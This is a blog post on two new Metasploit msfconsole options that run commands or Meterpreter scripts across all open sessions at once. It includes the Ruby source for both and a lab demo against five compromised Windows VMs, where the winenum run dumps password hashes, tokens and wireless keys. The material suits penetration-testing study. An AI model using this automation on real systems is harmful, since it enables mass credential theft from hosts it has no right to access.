New Options in Msfconsole Sessions Command

Metasploit recently added 2 new options to the sessions command in msfconsole. This 2 options are the ability to run commands on all open sessions and to run a Meterpreter script on all sessions that are of Meterpreter type. I consider this 2 options game changers when it comes to post exploitation since now one can run a command thru out a series of shells and be able to automate all sessions with Meterpreter at the same time.

Here is the output of the sessions command showing all options, the –c for the command execution and the –s for script execution. 

msf exploit(handler) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions.
    -c <opt>  Run a command on all live sessions
    -d <opt>  Detach an interactive session
    -h        Help banner.
    -i <opt>  Interact with the supplied session identifier.
    -k <opt>  Terminate session.
    -l        List all active sessions.
    -q        Quiet mode.
    -s <opt>  Run a script on all live meterpreter sessions
    -v        List verbose fields.

msf exploit(handler) >

Currently I have 5 session open to different systems all behind a series of firewalls that is why all sessions appear to come from a single IP. 

msf exploit(handler) > sessions -l 

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441
  2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920
  3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396
  4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686
  5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197

msf exploit(handler) >

Another very useful option that was added is the –v for verbose, this lets us know if the session was the result of an exploit, what exploit or received by Multi Handler.

msf exploit(handler) > sessions -v

Active sessions
===============

  Id  Description  Tunnel                                     Via
  --  -----------  ------                                     ---
  1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441  multi/handler
  2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920  multi/handler
  3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396   multi/handler
  4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686  multi/handler
  5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197  multi/handler

msf exploit(handler) >

 

Here is the code that is executed when the –c option is ran:

  1: cmds.each do |cmd|

  2: 	framework.sessions.each_sorted do |s|

  3: 		session = framework.sessions.get(s)

  4: 		print_status("Running '#{cmd}' on session #{s} (#{session.tunnel_peer})")

  5: 		if (session.type == "meterpreter")

  6: 			c,args = cmd.split(' ', 2)

  7: 			begin

  8: 				process = session.sys.process.execute(c, args, {

  9: 						'Channelized' => true,

 10: 						'Hidden'      => true

 11: 					})

 12: 			rescue ::Rex::Post::Meterpreter::RequestError

 13: 				print_error("Failed: #{$!.class} #{$!}")

 14: 

 15: 			end

 16: 			print_line(process.channel.read) if process and process.channel

 17: 		elsif session.type == "shell"

 18: 			# Then it's a regular shell, just send the command

 19: 			# to the session's stdin.

 20: 			session.write_shell(cmd + "\n")

 21: 			# read_shell blocks with no timeout, so we wrap

 22: 			# it in a select in case there is no output

 23: 			# from the command

 24: 			if select([session.rstream],nil,nil,3)

 25: 				output = session.read_shell

 26: 				print_line(output)

 27: 			end

 28: 		end

 29: 		# If the session isn't a meterpreter or shell type, it

 30: 		# could be a VNC session (which can't run commands) or

 31: 		# something custom (which we don't know how to run

 32: 		# commands on), so don't bother.

 33: 	end

 34: end

As it can be seen in the line 1 and 2 all commands are iterated one by one against each available session, the in likes 5 and 17 the sessions are checked to see if each one either a Meterpreter shell or a simple command Shell, this means we can write plug-ins that can automate against both types of shell using this code as example. As it can be seen in line 8 the type of command that we can run is a system command so none of the other Meterpreter commands can be used. Also on important thing to notice is that the rules for operating in a shell apply so one must be careful not to run commands that can break a shell like WMIC or certain types of SC. Lets run the hostname command on all shells:

msf exploit(handler) > sessions -c hostname
[*] Running 'hostname' on session 1 (192.168.1.138:50441)
winxplab01

[*] Running 'hostname' on session 2 (192.168.1.138:54920)
win2k3lab01

[*] Running 'hostname' on session 3 (192.168.1.138:1396)
win701

[*] Running 'hostname' on session 4 (192.168.1.138:61686)
winvis01

[*] Running 'hostname' on session 5 (192.168.1.138:57197)
WIN-YR4V852V71Y

msf exploit(handler) >

Now if we want to run commands with arguments we have to enclosed the command and the arguments in quotes, also remember that since this is ruby special characters must be escaped where it applies.  For example:

msf exploit(handler) > sessions -c 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'
[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 1 (192.168.1.138:50441)

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Microsoft Windows XP


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 2 (192.168.1.138:54920)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Microsoft Windows Server 2003


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 3 (192.168.1.138:1396)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Windows 7 Enterprise


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 4 (192.168.1.138:61686)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Windows Vista (TM) Enterprise


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 5 (192.168.1.138:57197)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName    REG_SZ    Windows Server (R) 2008 Enterprise


msf exploit(handler) >

The –s option for running script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option, this are:

  • Proper logging of data will become very important do to the possibility that a large number of shells are processed.
  • Logs should reference the host name or host local IP of a target since many systems are now behind NAT firewalls.
  • Multi Threading will be of great importance since each session is handle sequentially so having Multi Threaded scripts will be a great time saver.
  • Scripts should at least output the hostname so the attacker can now what host he is currently running the script against.
  • At the moment the script must run without options.

Here is the code executed when executing this option:

  1: if (not script.nil?)

  2: 	print_status("Running script #{script} on all meterpreter sessions ...")

  3: 	framework.sessions.each_sorted do |s|

  4: 		if ((session = framework.sessions.get(s)))

  5: 			if (session.type == "meterpreter")

  6: 				print_status("Session #{s} (#{session.tunnel_peer}):")

  7: 				begin

  8: 					client = session

  9: 					client.execute_script(script, binding)

 10: 				rescue ::Exception => e

 11: 					log_error("Error executing script: #{e.class} #{e}")

 12: 				end

 13: 			end

 14: 		end

 15: 	end

 16: else

 17: 	print_error("No script specified!")

 18: end

As it can be seen in line 5 only the sessions that are of Meterpreter type are the ones that will be interacted with.

Here is a summarized version of running winenum:

   1: msf exploit(handler) > sessions -s winenum
   2: [*] Running script winenum on all meterpreter sessions ...
   3: [*] Session 1 (192.168.1.138:50441):
   4: [*] Running Windows Local Enumerion Meterpreter Script
   5: [*] New session on 192.168.1.138:50441...
   6: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/WINXPLAB01_20091225.4410-04411.txt
   7: [*] Checking if WINXPLAB01 is a Virtual Machine ........
   8: [*] BIOS Check Failed
   9: [*]     This is a VMWare virtual Machine
  10: [*] Running Command List ...
  11: [*]     running command cmd.exe /c set
  12: [*]     running command ipconfig /all
  13: ..........
  14: [*] Running WMIC Commands ....
  15: [*]     running command wmic computersystem list brief
  16: ..........
  17: [*] Extracting software list from registry
  18: [*] Dumping and Downloading the Registry entries for Configured Wireless Networks
  19: [*]     Exporting HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces
  20: [*]     Compressing key into cab file for faster download
  21: [*]     Downloading wlan_20091225.4410-04411.cab to -> /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/wlan_20091225.4410-04411.cab
  22: [*]     Deleting left over files
  23: [*] Dumping password hashes...
  24: [*] Hashes Dumped
  25: [*] Getting Tokens...
  26: [*] All tokens have been processed
  27: [*] Done!
  28: [*] Session 2 (192.168.1.138:54920):
  29: [*] Running Windows Local Enumerion Meterpreter Script
  30: [*] New session on 192.168.1.138:54920...
  31: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN2K3LAB01_20091225.4538-95293/WIN2K3LAB01_20091225.4538-95293.txt
  32: [*] Checking if WIN2K3LAB01 is a Virtual Machine ........
  33: [*]     This is a VMware Workstation/Fusion Virtual Machine
  34: [*] Running Command List ...
  35: [*]     running command cmd.exe /c set
  36: ..........
  37: [*] Running WMIC Commands ....
  38: [*]     running command wmic computersystem list brief
  39: ..........
  40: [*] Extracting software list from registry
  41: [*] Dumping password hashes...
  42: [*] Hashes Dumped
  43: [*] Getting Tokens...
  44: [*] All tokens have been processed
  45: [*] Done!
  46: [*] Session 3 (192.168.1.138:1396):
  47: [*] Running Windows Local Enumerion Meterpreter Script
  48: [*] New session on 192.168.1.138:1396...
  49: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN701_20091225.4637-88208/WIN701_20091225.4637-88208.txt
  50: [*] Checking if WIN701 is a Virtual Machine ........
  51: [*]     This is a VMware Workstation/Fusion Virtual Machine
  52: [*] Checking if UAC is enabled ...
  53: [*]     UAC is Enabled
  54: [*] Running Command List ...
  55: [*]     running command cmd.exe /c set
  56: ..........
  57: [*] Running WMIC Commands ....
  58: [*]     running command wmic computersystem list brief
  59: ..........
  60: [*] Extracting software list from registry
  61: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges
  62: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.
  63: [*] Getting Tokens...
  64: [*] Error Getting Tokens: Rex::TimeoutError Operation timed out.
  65: [*] Done!
  66: [*] Session 4 (192.168.1.138:61686):
  67: [*] Running Windows Local Enumerion Meterpreter Script
  68: [*] New session on 192.168.1.138:61686...
  69: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINVIS01_20091225.4927-83932/WINVIS01_20091225.4927-83932.txt
  70: [*] Checking if WINVIS01 is a Virtual Machine ........
  71: [*]     This is a VMware Workstation/Fusion Virtual Machine
  72: [*] Checking if UAC is enabled ...
  73: [*]     UAC is Enabled
  74: [*] Running Command List ...
  75: [*]     running command cmd.exe /c set
  76: ..........
  77: [*] Running WMIC Commands ....
  78: [*]     running command wmic computersystem list brief
  79: ..........
  80: [*] Extracting software list from registry
  81: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges
  82: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.
  83: [*] Getting Tokens...
  84: [*] All tokens have been processed
  85: [*] Done!
  86: [*] Session 5 (192.168.1.138:57197):
  87: [*] Running Windows Local Enumerion Meterpreter Script
  88: [*] New session on 192.168.1.138:57197...
  89: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN-YR4V852V71Y_20091225.5019-40179/WIN-YR4V852V71Y_20091225.5019-40179.txt
  90: [*] Checking if WIN-YR4V852V71Y is a Virtual Machine ........
  91: [*]     This is a VMware Workstation/Fusion Virtual Machine
  92: [*] Running Command List ...
  93: [*]     running command cmd.exe /c set
  94: ..........
  95: [*] Running WMIC Commands ....
  96: [*]     running command wmic computersystem list brief
  97: ..........
  98: [*] Extracting software list from registry
  99: [-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.
 100: [*] Getting Tokens...
 101: [*] All tokens have been processed
 102: [*] Done!
 103: msf exploit(handler) >

As it can be seen the Framework is advancing a great number of features and new options are being added. I do have to say that the path in which the HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.